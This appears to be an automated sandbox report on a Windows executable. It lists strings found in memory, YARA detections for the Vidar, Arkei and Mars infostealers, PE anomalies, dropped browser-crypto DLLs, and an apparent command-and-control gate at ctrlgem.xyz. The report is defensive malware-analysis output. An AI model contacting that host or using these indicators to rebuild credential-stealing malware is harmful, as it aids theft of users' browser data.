Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: m0wsoI3.exe, 00000000.00000002.1300238771.0000000000507000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctrlgem.xyz/gate.php
Source: m0wsoI3.exe, 00000000.00000002.1300238771.0000000000507000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctrlgem.xyz/requestb
Source: m0wsoI3.exe, 00000000.00000002.1300238771.0000000000507000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://ctrlgem.xyz/requestj
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ocsp.thawte.com0
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: mozglue.dll.0.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: http://www.mozilla.com0
Source: ZUKFK6PZ.0.dr String found in binary or memory: https://ac.ecosia.org?q=
Source: ZUKFK6PZ.0.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: m0wsoI3.exe, 00000000.00000003.1260169616.000000000059C000.00000004.00000020.00020000.00000000.sdmp, ZUKFK6PZ.0.dr String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: m0wsoI3.exe, 00000000.00000003.1260169616.000000000059C000.00000004.00000020.00020000.00000000.sdmp, ZUKFK6PZ.0.dr String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: ZUKFK6PZ.0.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: m0wsoI3.exe, 00000000.00000003.1260169616.000000000059C000.00000004.00000020.00020000.00000000.sdmp, ZUKFK6PZ.0.dr String found in binary or memory: https://duckduckgo.com/chrome_newtabv20-
Source: ZUKFK6PZ.0.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: ZUKFK6PZ.0.dr String found in binary or memory: https://gemini.google.com/app?q=
Source: m0wsoI3.exe, 00000000.00000003.1276800018.000000000F417000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1310926889.000000001045F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
Source: m0wsoI3.exe, 00000000.00000002.1310926889.000000001045F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefox
Source: m0wsoI3.exe, 00000000.00000003.1276800018.000000000F417000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://support.mozilla.org/products/firefoxgro.allizom.troppus.ZAnPVwXvBbYt
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, freebl3.dll.0.dr, mozglue.dll.0.dr, softokn3.dll.0.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: m0wsoI3.exe, 00000000.00000003.1260169616.000000000059C000.00000004.00000020.00020000.00000000.sdmp, ZUKFK6PZ.0.dr String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: m0wsoI3.exe, 00000000.00000003.1260169616.000000000059C000.00000004.00000020.00020000.00000000.sdmp, ZUKFK6PZ.0.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: m0wsoI3.exe, 00000000.00000002.1310926889.000000001045F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/
Source: m0wsoI3.exe, 00000000.00000003.1276800018.000000000F417000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
Source: m0wsoI3.exe, 00000000.00000002.1310926889.000000001045F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/
Source: m0wsoI3.exe, 00000000.00000003.1276800018.000000000F417000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
Source: m0wsoI3.exe, 00000000.00000003.1276800018.000000000F417000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1310926889.000000001045F000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig

System Summary
barindex
Malicious sample detected (through community Yara rule)
Source: 0.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_ArkeiStealer_84c7086a Author: unknown
Source: 0.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Detect Mars Stealer based on a specific XOR routine Author: Sekoia.io
Source: 00000000.00000002.1299941193.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_ArkeiStealer_84c7086a Author: unknown
Source: 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: Process Memory Space: m0wsoI3.exe PID: 7292, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: decrypted.memstr, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
Source: decrypted.memstr, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 Author: unknown
PE file has a writeable .text section
Source: m0wsoI3.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
PE file has nameless sections
Source: m0wsoI3.exe Static PE information: section name:
Detected potential crypto function
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0041B020 0_2_0041B020
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_00410F00 0_2_00410F00
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0041A790 0_2_0041A790
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0041A190 0_2_0041A190
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_0041A5A0 0_2_0041A5A0
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_004107B0 0_2_004107B0
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6095C314 0_2_6095C314
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6094DA3A 0_2_6094DA3A
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_609300CC 0_2_609300CC
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_609660FA 0_2_609660FA
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6092114F 0_2_6092114F
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6091F2C9 0_2_6091F2C9
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6096923E 0_2_6096923E
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60950312 0_2_60950312
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6094D33B 0_2_6094D33B
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6093B368 0_2_6093B368
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6096748C 0_2_6096748C
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6093F42E 0_2_6093F42E
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60954470 0_2_60954470
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_609615FA 0_2_609615FA
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6096A5EE 0_2_6096A5EE
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6096D6A4 0_2_6096D6A4
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_609606A8 0_2_609606A8
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60932654 0_2_60932654
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60955665 0_2_60955665
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6094B7DB 0_2_6094B7DB
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60964807 0_2_60964807
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6094E9BC 0_2_6094E9BC
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60937929 0_2_60937929
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6093FAD6 0_2_6093FAD6
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_6096DAE8 0_2_6096DAE8
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60936B27 0_2_60936B27
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60954CF6 0_2_60954CF6
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60950C6B 0_2_60950C6B
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60966DF1 0_2_60966DF1
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60963D35 0_2_60963D35
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60909E9C 0_2_60909E9C
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60951E86 0_2_60951E86
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60912E0B 0_2_60912E0B
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: 0_2_60954FF8 0_2_60954FF8
Dropped file seen in connection with other malware
Source: Joe Sandbox View Dropped File: C:\ProgramData\freebl3.dll A770ECBA3B08BBABD0A567FC978E50615F8B346709F8EB3CFACF3FAAB24090BA
Found potential string decryption / allocating functions
Source: C:\Users\user\Desktop\m0wsoI3.exe Code function: String function: 004054F0 appears 577 times
Sample file is different than original file name gathered from version info
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamesoftokn3.dll8 vs m0wsoI3.exe
Source: m0wsoI3.exe, 00000000.00000002.1308783263.000000000F65B000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamefreebl3.dll8 vs m0wsoI3.exe
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100E5000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamevcruntime140.dll^ vs m0wsoI3.exe
Source: m0wsoI3.exe, 00000000.00000002.1300238771.0000000000584000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemozglue.dll8 vs m0wsoI3.exe
Source: m0wsoI3.exe, 00000000.00000002.1308783263.000000000F688000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: OriginalFilenamemsvcp140.dll^ vs m0wsoI3.exe
Uses 32bit PE files
Source: m0wsoI3.exe Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
Yara signature match
Source: 0.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_ArkeiStealer_84c7086a reference_sample = 708d9fb40f49192d4bf6eff62e0140c920a7eca01b9f78aeaf558bef0115dbe2, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.ArkeiStealer, fingerprint = f1d701463b0001de8996b30d2e36ddecb93fe4ca2a1a26fc4fcdaeb0aa3a3d6d, id = 84c7086a-abc3-4b97-b325-46a078b90a95, last_modified = 2022-04-12
Source: 0.2.m0wsoI3.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: infostealer_win_mars_stealer_xor_routine author = Sekoia.io, description = Detect Mars Stealer based on a specific XOR routine, creation_date = 2022-04-06, classification = TLP:CLEAR, version = 1.0, id = 3e2c7440b2fc9e4b039e6fa8152ac8ff
Source: 00000000.00000002.1299941193.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY Matched rule: Windows_Trojan_ArkeiStealer_84c7086a reference_sample = 708d9fb40f49192d4bf6eff62e0140c920a7eca01b9f78aeaf558bef0115dbe2, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.ArkeiStealer, fingerprint = f1d701463b0001de8996b30d2e36ddecb93fe4ca2a1a26fc4fcdaeb0aa3a3d6d, id = 84c7086a-abc3-4b97-b325-46a078b90a95, last_modified = 2022-04-12
Source: 00000000.00000002.1300238771.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: Process Memory Space: m0wsoI3.exe PID: 7292, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: decrypted.memstr, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: decrypted.memstr, type: MEMORYSTR Matched rule: Windows_Trojan_Vidar_114258d5 reference_sample = 34c0cb6eaf2171d3ab9934fe3f962e4e5f5e8528c325abfe464d3c02e5f939ec, os = windows, severity = x86, creation_date = 2021-06-28, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Vidar, fingerprint = 9b4f7619e15398fcafc622af821907e4cf52964c55f6a447327738af26769934, id = 114258d5-f05e-46ac-914b-1a7f338ccf58, last_modified = 2021-08-23
Source: m0wsoI3.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@6/16@1/1
Source: C:\Users\user\Desktop\m0wsoI3.exe File created: C:\Users\user\Desktop\DBAI5X4O Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7884:120:WilError_03
Source: C:\Users\user\Desktop\m0wsoI3.exe Mutant created: NULL
Source: C:\Users\user\Desktop\m0wsoI3.exe File read: C:\Users\user\Desktop\desktop.ini Jump to behavior
Source: C:\Users\user\Desktop\m0wsoI3.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: m0wsoI3.exe, 00000000.00000002.1308321209.000000000F223000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1314801016.000000006096F000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: nss3.dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);docid INTEGER PRIMARY KEY%z, 'c%d%q'%z, langidCREATE TABLE %Q.'%q_content'(%s)CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);m
Source: m0wsoI3.exe, m0wsoI3.exe, 00000000.00000002.1308321209.000000000F223000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1314801016.000000006096F000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'
Source: m0wsoI3.exe, m0wsoI3.exe, 00000000.00000002.1308321209.000000000F223000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1314801016.000000006096F000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: m0wsoI3.exe, 00000000.00000002.1308321209.000000000F223000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1314801016.000000006096F000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: m0wsoI3.exe, m0wsoI3.exe, 00000000.00000002.1308321209.000000000F223000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1314801016.000000006096F000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND coalesce(rootpage,1)>0
Source: m0wsoI3.exe, 00000000.00000002.1308321209.000000000F223000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1314801016.000000006096F000.00000002.00001000.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_node"(nodeno INTEGER PRIMARY KEY, data BLOB);CREATE TABLE "%w"."%w_rowid"(rowid INTEGER PRIMARY KEY, nodeno INTEGER);CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY, parentnode INTEGER);INSERT INTO '%q'.'%q_node' VALUES(1, zeroblob(%d))
Source: m0wsoI3.exe, 00000000.00000002.1308321209.000000000F223000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1314801016.000000006096F000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: m0wsoI3.exe, 00000000.00000002.1308321209.000000000F223000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1314801016.000000006096F000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: m0wsoI3.exe, 00000000.00000002.1308321209.000000000F223000.00000004.00000020.00020000.00000000.sdmp, m0wsoI3.exe, 00000000.00000002.1314801016.000000006096F000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s;
Source: m0wsoI3.exe, 00000000.00000002.1309437455.00000000100BE000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
